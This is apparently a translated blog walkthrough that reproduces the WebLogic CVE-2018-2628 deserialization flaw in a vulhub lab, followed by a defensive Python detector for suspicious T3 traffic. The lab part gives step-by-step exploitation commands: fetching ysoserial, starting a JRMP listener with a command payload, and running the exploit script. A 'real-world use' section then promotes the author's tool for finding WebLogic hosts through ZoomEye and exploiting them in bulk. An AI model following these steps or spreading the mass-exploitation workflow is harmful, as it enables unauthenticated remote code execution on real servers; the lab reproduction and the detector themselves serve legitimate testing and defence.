Reproducing the CVE-2018-2628 deserialization vulnerability


First, download the corresponding project from vulhub, change into its directory, and run:

docker-compose up -d

Once the environment is up, browse to 127.0.0.1:7001.
The following page appears:

ksQKVH.png

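Vulnerability overview

Oracle's April 2018 patch fixed a deserialization vulnerability (CVE-2018-2628) in the WLS Core Components of WebLogic Server. The vulnerability is triggered over the T3 protocol and allows an unauthenticated user to execute arbitrary commands on the remote server.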

Reproducing the vulnerability
Download the corresponding exploit tools:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
Copy the exploit code from https://www.exploit-db.com/exploits/44553

Exploitation:
Start a JRMP server:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

listen port = the port to listen on
command = the command you want to execute

Example: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1001 CommonsCollections1 'touch /haq520'
kstj2j.png

Send the exploit

python exp.py 127.0.0.1 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 127.0.0.1 1099 JRMPClient

ksNMdK.md.png

Result:

ksNaeP.png

Real-world use
As mentioned above, I owed 慕慕 a script; I finished writing it this afternoon and put it in the repository:
python/weblogic反序列化批量利用 at master · 422926799/python · GitHub

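Notes:
Batch exploitation of WebLogic deserialization. It can determine from keywords in the web page whether a host runs WebLogic, check targets in bulk or one at a time, test whether port 7001 is open, and fetch IPs from ZoomEye. Configure search.ini in the config folder yourself, filling in your ZoomEye user and pwd.

Test results:

ksNszj.png
ksNTSJ.png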
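For defenders watching the T3 port, the following is an added example (not part of the original post or of the tools it references) of a heuristic that inspects the reassembled client-to-server bytes of one connection for a T3 handshake followed by a Java serialization stream naming RMI classes. The flagged package prefixes, the function names and the sample bytes are assumptions constructed for illustration.

```python
import re

JAVA_MAGIC = b"\xac\xed\x00\x05"               # Java serialization STREAM_MAGIC + STREAM_VERSION
T3_HELLO = re.compile(rb"t3 \d+(?:\.\d+)+\n")  # first line of a T3 client handshake
CLASS_NAME = re.compile(rb"(?:[A-Za-z_$][\w$]*\.)+[A-Za-z_$][\w$]*")
RMI_PREFIXES = ("java.rmi.", "sun.rmi.")       # assumption: packages worth flagging


def class_names(blob):
    """Return class-like names stored as 2-byte big-endian length + ASCII text."""
    found = []
    for i in range(len(blob) - 2):
        n = int.from_bytes(blob[i:i + 2], "big")
        cand = blob[i + 2:i + 2 + n]
        # Requiring the length prefix to match keeps stray ASCII out of the result.
        if 8 <= n <= 255 and len(cand) == n and CLASS_NAME.fullmatch(cand):
            found.append(cand.decode("ascii"))
    return found


def inspect_t3_stream(data):
    """Inspect the reassembled client-to-server bytes of one TCP connection."""
    is_t3 = bool(T3_HELLO.match(data))
    first = data.find(JAVA_MAGIC)
    names = class_names(data[first:]) if first != -1 else []
    rmi = [n for n in names if n.startswith(RMI_PREFIXES)]
    return {"t3_hello": is_t3, "serialized_streams": data.count(JAVA_MAGIC),
            "rmi_classes": rmi, "alert": is_t3 and bool(rmi)}


def _utf(name):
    """Encode a name the way the serialization stream does: length, then bytes."""
    raw = name.encode("ascii")
    return len(raw).to_bytes(2, "big") + raw


# Constructed samples: structural fragments only, not valid serialized objects.
HELLO = b"t3 12.2.1\nAS:255\nHL:19\n\n"
SUSPECT = (HELLO + JAVA_MAGIC + b"\x7d\x00\x00\x00\x01"
           + _utf("java.rmi.registry.Registry") + b"\x72"
           + _utf("java.rmi.server.RemoteObjectInvocationHandler") + bytes(8))
BENIGN = HELLO + JAVA_MAGIC + b"\x72" + _utf("weblogic.rjvm.ClassTableEntry") + bytes(8)

if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, inspect_t3_stream(sample))
```

A hit is a triage signal rather than proof of exploitation, so pair it with a check for unexpected outbound connections from the WebLogic host.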